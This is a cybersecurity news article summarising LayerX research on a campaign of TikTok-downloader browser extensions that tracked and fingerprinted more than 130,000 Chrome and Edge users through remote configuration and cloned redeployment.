Ddos 
A new report from LayerX security researchers has pulled back the curtain on a massive, coordinated campaign involving at least 12 interrelated browser extensions. While these tools promise to help users save their favorite TikTok content, they are secretly operating as a “long-standing and persistent campaign” designed to track user activity and harvest data.
To date, the operation has successfully compromised over 130,000 users across the Google Chrome and Microsoft Edge marketplaces.
The campaign’s success lies in its use of a single code family to create a “resilient ecosystem”. Instead of building unique tools, the threat actor spins off multiple versions—some are nearly identical clones, while others are lightly rebranded under names like “TikTok Video Downloader,” “Mass Tik Tok Downloader,” and “No Watermark Saver”.
This strategy creates a continuous cycle that LayerX researchers describe as an operational model rather than just a malware campaign:
- Gain Trust: Extensions often operate legitimately for 6-12 months before introducing malicious features.
- Official Endorsement: Many of these extensions managed to earn a “Featured” badge in official stores. As the report notes, “this designation is typically associated with vetted, high-quality extensions… it significantly lowers user suspicion and increases installation likelihood”.
- Rapid Redeployment: When one extension is finally flagged and removed, the attackers simply upload new clones with the same descriptions and functionality.
The most dangerous technical aspect of these extensions is their reliance on dynamic remote configuration. Rather than hardcoding malicious behavior, the extensions fetch instructions from attacker-controlled servers.
This mechanism allows the attackers to “modify their behavior and functionality after installation, without users or marketplaces being aware”. By altering behavior instantly, the extensions can bypass store review processes, enabling data flows that remain invisible to security auditors.
Beyond tracking browsing habits, these extensions collect a startling amount of telemetry to create a unique “fingerprint” for every user. Collected data includes:
- Usage patterns and interacted content.
- Device characteristics like language, timezone, and user agent.
- Battery status, which researchers call “an unusual but valuable signal for device fingerprinting”.
LayerX researchers warn that this campaign represents a broader shift in how browser extensions are exploited. The true risk is not just what the extensions are doing now, but their potential for “broader data exfiltration, abuse of authenticated requests, or integration into larger proxy or botnet-like infrastructures” in the future.
The report concludes with a reminder: “The real risk lies not in what the extensions do today, but in what they are capable of doing tomorrow”.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
